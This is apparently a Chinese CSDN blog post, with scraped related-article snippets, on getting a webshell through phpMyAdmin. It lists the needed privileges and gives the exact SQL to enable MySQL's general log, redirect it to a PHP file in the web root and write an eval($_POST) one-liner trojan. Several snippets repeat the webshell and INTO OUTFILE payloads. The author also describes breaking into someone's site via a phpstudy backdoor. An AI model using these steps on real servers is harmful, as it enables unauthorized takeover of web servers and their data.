phpmyadmin getshell

最新推荐文章于 2023-09-20 15:16:20 发布
最新推荐文章于 2023-09-20 15:16:20 发布
阅读量255 收藏 1
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hsj_csdn/article/details/102791810
版权

本来搞了一个站,想记录一下,结果手抖刷新了一下写文章的界面,写了一大半的文章就没了…

简单说一下,

进入 phpmyadmin 后,getshell 有两种办法。一是执行sql语句导出shell到web目录下;二是开启日志功能,改变日志文件到web目录下,然后执行sql语句,在sql语句中写php代码。

其中,方法一需要满足三个条件:①数据库root权限;②知道web目录的绝对路径;③mysql有写文件权限。

方法二满足条件①②即可,但需要mysql版本在5.0+,因为在MySQL 5.0+的版本会自动创建日志文件,那么在服务运行的情况下修改全局变量也是可以变动文件位置的。

方法二(Linux环境下可能会比较苛刻,因为站点目录是一个用户,MySQL是另外一个用户,权限管控较为严格,主要取决于权限配置是否得当)

介绍两个全局变量,如下,

general_log 指日志保存状态。ON表示开启,OFF表示关闭功能。

general_log_file 指日志文件的保存路径。

具体的操作就是,

【1】日志功能默认关闭,需要执行sql语句开启日志功能。

set global general_log = "ON";

【2】将日志文件的保存路径修改为web目录的绝对路径+文件名.php。

SET global general_log_file='web目录的绝对路径/shell.php';

【3】执行一个带有一句话木马的sql语句,让shell.php日志文件将一句话木马记录下来。

select  '<?php eval($_POST["a"]);?>';

然后访问shell.php,其中的php代码就会被执行。

顺便说一句,这个站还是之前用phpstudy后门搞下来的那个老哥。。本来那个服务器已经关闭了。结果今天他又扫我了…没事老扫我80端口干嘛,

tiaotiao97
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1836
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpMyAdmin 4.0.10 文件包含 -> getshell
最新发布
2301_80115097的博客
06-25 888
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
PHPmyadmin Getshell
Grey的博客
07-21 6888
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
phpmyadmin页面getshell
qq_52469895的博客
04-10 2395
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,让我们了解Laravel Homestead。它是基于Vagrant和VirtualBox的,允许开发者在虚拟机中运行...
Albatros:Docker Lammp
05-13
适用于debian-linux-gnu(x86_64)MySQL 5.6.24PhpMyAdmin 4.2.12deb2 ,MySql管理员。 节点v0.12.5 , 。 npm v2.11.2 , 。 PhantomJS 1.8.9 , 。 Python 3.4.3 , 。Docker安装用主机用户替换Ubuntu。 curl -...
阿里云主机一键安装lamp、lnmp环境的shell脚本分享
01-20
阿里云主机一键安装lamp,lnmp,自动安装脚本,由阿里云主机分享 ...1、阿里云分享的一键安装lamp,lnmp,此安装...ftp:(yum/apt-get安装) phpwind:8.7 GBK phpmyadmin:4.1.8 2、请使用最新的一键安装包脚本安装,以前
记一次HW目标测试1
08-03
登录后,发现系统是通达OA2013,该系统存在直接变量覆盖的GETShell漏洞。GETShell漏洞是指攻击者通过操纵HTTP GET请求中的参数值,使程序在处理时意外覆盖了内部变量,从而可能执行恶意代码。 为了利用这个漏洞,...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
渗透测试-PhpMyAdmin后台getshell
道阻且长,行则将至。
08-10 5296
在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell。 MySQL导出木马 最常用的是通过into outfile直接写入一句话木马: select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php'; 当然,前...
phpMyadmin getshell思路
千寻的博客
03-07 611
文章目录一.phpMyadmin简介二.phpMyadmin getshell思路1.流程简述2.信息收集3.获取网站真实路径的作用一免责声明 一.phpMyadmin简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其...
phpmyadmin之getshell总结
Adminxe的博客
05-03 506
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用查询日志getse...
phpMyAdmin getshell总结
zzgslh的博客
04-14 745
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin写权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有写入权限 3.secure_ file_ priv没有具体值 ...
PhpMyadmin--getshell
qq_64664156的博客
09-20 508
phpMyAdmin通过MySQL日志文件getshell
shell脚本安装phpmyadmin
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora:yum install php 3.安装apache web服务器(如果尚未安装): - Debian/Ubuntu:apt-get install apache2 - CentOS/Fedora:yum install httpd 4.安装phpMyAdmin: - Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员用户名和密码。 6.启动Web服务器: - Debian/Ubuntu:service apache2 start - CentOS/Fedora:service httpd start
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值